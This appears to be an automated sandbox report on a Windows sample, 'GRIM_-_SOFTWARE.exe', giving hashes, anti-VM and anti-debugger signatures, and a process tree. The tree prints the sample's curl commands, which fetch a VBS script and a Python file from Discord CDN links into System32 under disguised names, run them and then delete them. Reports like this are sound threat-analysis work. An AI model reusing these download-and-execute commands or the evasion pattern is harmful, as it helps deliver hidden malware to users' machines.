Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
25-03-2023 22:51
Behavioral task
behavioral1
Sample
GRIM_-_SOFTWARE.exe
Resource
win7-20230220-en
General
-
Target
GRIM_-_SOFTWARE.exe
-
Size
3.8MB
-
MD5
6d7e1336a7185a2049c09429cc980b75
-
SHA1
fd2de69db4416363fb6e34b42e0510256e0e28aa
-
SHA256
01324ea7cc70df8163a950920606ec33375dd911b5297bf6d204939d19a1ffcb
-
SHA512
88cf6bfc2deb543e0644100c7a3d547bd18a1e05715a4554d7c45a21a608bbf8821e0427630de9298197477dd5df2317c2c5c2aa01c1cbfe3a7b5531f91547e0
-
SSDEEP
98304:s/dtvQLaLimy/whXcohnwA3wPiee6R8dqFedrh1NqYQ8wUkdqz54v8mY:gdt8my/ysoBDAPiURzenxuc4k1
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
GRIM_-_SOFTWARE.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ GRIM_-_SOFTWARE.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
GRIM_-_SOFTWARE.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion GRIM_-_SOFTWARE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion GRIM_-_SOFTWARE.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation cmd.exe -
Processes:
resource yara_rule behavioral2/memory/3804-133-0x00007FF687160000-0x00007FF687B57000-memory.dmp themida behavioral2/memory/3804-134-0x00007FF687160000-0x00007FF687B57000-memory.dmp themida behavioral2/memory/3804-135-0x00007FF687160000-0x00007FF687B57000-memory.dmp themida behavioral2/memory/3804-136-0x00007FF687160000-0x00007FF687B57000-memory.dmp themida behavioral2/memory/3804-137-0x00007FF687160000-0x00007FF687B57000-memory.dmp themida behavioral2/memory/3804-143-0x00007FF687160000-0x00007FF687B57000-memory.dmp themida behavioral2/memory/3804-145-0x00007FF687160000-0x00007FF687B57000-memory.dmp themida -
Processes:
GRIM_-_SOFTWARE.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA GRIM_-_SOFTWARE.exe -
Drops file in System32 directory 3 IoCs
Processes:
curl.execurl.execurl.exedescription ioc process File created C:\Windows\System32\prnmngrs.vbs curl.exe File created C:\Windows\System32\IME\SHARED\IMESEARCHING.py curl.exe File created C:\Windows\System32\Windows_FIEO.mp3 curl.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
GRIM_-_SOFTWARE.exepid process 3804 GRIM_-_SOFTWARE.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 3 IoCs
Processes:
cmd.exeWScript.exeOpenWith.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings WScript.exe Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings OpenWith.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
AUDIODG.EXEdescription pid process Token: 33 5040 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 5040 AUDIODG.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
OpenWith.exepid process 404 OpenWith.exe -
Suspicious use of WriteProcessMemory 42 IoCs
Processes:
GRIM_-_SOFTWARE.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3804 wrote to memory of 3700 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 3804 wrote to memory of 3700 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 3700 wrote to memory of 4064 3700 cmd.exe curl.exe PID 3700 wrote to memory of 4064 3700 cmd.exe curl.exe PID 3804 wrote to memory of 2796 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 3804 wrote to memory of 2796 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 2796 wrote to memory of 1572 2796 cmd.exe curl.exe PID 2796 wrote to memory of 1572 2796 cmd.exe curl.exe PID 3804 wrote to memory of 2288 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 3804 wrote to memory of 2288 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 2288 wrote to memory of 3600 2288 cmd.exe WScript.exe PID 2288 wrote to memory of 3600 2288 cmd.exe WScript.exe PID 3804 wrote to memory of 4732 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 3804 wrote to memory of 4732 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 3804 wrote to memory of 4204 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 3804 wrote to memory of 4204 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 3804 wrote to memory of 1856 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 3804 wrote to memory of 1856 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 3804 wrote to memory of 4636 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 3804 wrote to memory of 4636 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 4636 wrote to memory of 3316 4636 cmd.exe certutil.exe PID 4636 wrote to memory of 3316 4636 cmd.exe certutil.exe PID 4636 wrote to memory of 1060 4636 cmd.exe find.exe PID 4636 wrote to memory of 1060 4636 cmd.exe find.exe PID 4636 wrote to memory of 3988 4636 cmd.exe find.exe PID 4636 wrote to memory of 3988 4636 cmd.exe find.exe PID 3804 wrote to memory of 2584 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 3804 wrote to memory of 2584 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 2584 wrote to memory of 3840 2584 cmd.exe curl.exe PID 2584 wrote to memory of 3840 2584 cmd.exe curl.exe PID 3804 wrote to memory of 3760 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 3804 wrote to memory of 3760 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 3804 wrote to memory of 396 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 3804 wrote to memory of 396 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 3804 wrote to memory of 4508 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 3804 wrote to memory of 4508 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 3804 wrote to memory of 1640 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 3804 wrote to memory of 1640 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 3804 wrote to memory of 5036 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 3804 wrote to memory of 5036 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 3804 wrote to memory of 4680 3804 GRIM_-_SOFTWARE.exe cmd.exe PID 3804 wrote to memory of 4680 3804 GRIM_-_SOFTWARE.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe"C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/879759160613433367/1083836125409447966/me.vbs --output C:/Windows/System32/prnmngrs.vbs2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl --silent https://cdn.discordapp.com/attachments/879759160613433367/1083836125409447966/me.vbs --output C:/Windows/System32/prnmngrs.vbs3⤵
- Drops file in System32 directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/882707027791605791/1089311596381220945/Fortnite_hack_toolv2.py --output C:/Windows/System32/IME/SHARED/IMESEARCHING.py >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl --silent https://cdn.discordapp.com/attachments/882707027791605791/1089311596381220945/Fortnite_hack_toolv2.py --output C:/Windows/System32/IME/SHARED/IMESEARCHING.py3⤵
- Drops file in System32 directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:/Windows/System32/prnmngrs.vbs C:/Windows/System32/IME/SHARED/IMESEARCHING.py2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\System32\prnmngrs.vbs" C:/Windows/System32/IME/SHARED/IMESEARCHING.py3⤵
- Modifies registry class
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe" MD5 | find /i /v "md5" | find /i /v "certutil"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe" MD53⤵
-
C:\Windows\system32\find.exefind /i /v "md5"3⤵
-
C:\Windows\system32\find.exefind /i /v "certutil"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/879759160613433367/1079159361764602037/Welcome.mp3 --output C:/Windows/System32/Windows_FIEO.mp3 >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl --silent https://cdn.discordapp.com/attachments/879759160613433367/1079159361764602037/Welcome.mp3 --output C:/Windows/System32/Windows_FIEO.mp33⤵
- Drops file in System32 directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del C:\Windows\System32\Windows_FIEO.mp32⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del C:/Windows/System32/prnmngrs.vbs2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del C:/Windows/System32/IME/SHARED/IMESEARCHING.py2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x474 0x4c41⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\System32\IME\SHARED\IMESEARCHING.pyFilesize
515KB
MD57496905a1473f87362a0b838aaae1d60
SHA1e08a76acae2addf87faf4999ccce642dbf903c1a
SHA256a02ca0d375e96b5c2c65ff510ea4139cc064d9cef37a7e6e1077ba962ee0ea8c
SHA5128d18fb0e5cdbb138d97d315bd8cee9de03ec474c7d1cc426d502723edaf76b0abbd6ba2d0197255bbb13fc3834d0f62ae9f6b2b2a31176547992846f22e0bb70
-
C:\Windows\System32\Windows_FIEO.mp3Filesize
9KB
MD57a3a54e10348afe1b57c512ad2466562
SHA1ec0c5a195c5b7383cb1cb2058f30f6c054f47c83
SHA25674c4c6de3ef3aa22b41bd4f4f7ca88da3424306ce04f110943628e3ff624c18b
SHA512e822769580d34bdcedb1b92f58a6838a35debed6a0fdd389c2dfc7b461a0f5761924ddcadf776d0240831d4735404455dc534fd43b64570dfe68b590b31e2f85
-
C:\Windows\System32\prnmngrs.vbsFilesize
74B
MD53269bd7a1b211a3c0e4ee7fa6649105a
SHA1b96df5fd92329ce6f7f178aaae5852b921e0ff47
SHA256c4831319543698126520cb5bb4a438dbca70fc2fa899151dbec613d320a50896
SHA51241687e2c11c73185c0f398f6ed66466a8820d6c7b1a740ca3bbfb6cab4a059939db4f20d76d7a7fa3d943a55bd394bae61f2b72947b69995b041611245c787d4
-
memory/3804-145-0x00007FF687160000-0x00007FF687B57000-memory.dmpFilesize
10.0MB
-
memory/3804-137-0x00007FF687160000-0x00007FF687B57000-memory.dmpFilesize
10.0MB
-
memory/3804-136-0x00007FF687160000-0x00007FF687B57000-memory.dmpFilesize
10.0MB
-
memory/3804-135-0x00007FF687160000-0x00007FF687B57000-memory.dmpFilesize
10.0MB
-
memory/3804-143-0x00007FF687160000-0x00007FF687B57000-memory.dmpFilesize
10.0MB
-
memory/3804-133-0x00007FF687160000-0x00007FF687B57000-memory.dmpFilesize
10.0MB
-
memory/3804-134-0x00007FF687160000-0x00007FF687B57000-memory.dmpFilesize
10.0MB
-
memory/3804-147-0x00000181EE9C0000-0x00000181EE9D0000-memory.dmpFilesize
64KB
-
memory/3804-148-0x00000181EE9C0000-0x00000181EE9D0000-memory.dmpFilesize
64KB
-
memory/3804-149-0x00000181EE9C0000-0x00000181EE9D0000-memory.dmpFilesize
64KB
-
memory/3804-150-0x00000181EE9C0000-0x00000181EE9D0000-memory.dmpFilesize
64KB
-
memory/3804-151-0x00000181EE9D0000-0x00000181EE9D1000-memory.dmpFilesize
4KB
-
memory/3804-152-0x00000181EE9C0000-0x00000181EE9D0000-memory.dmpFilesize
64KB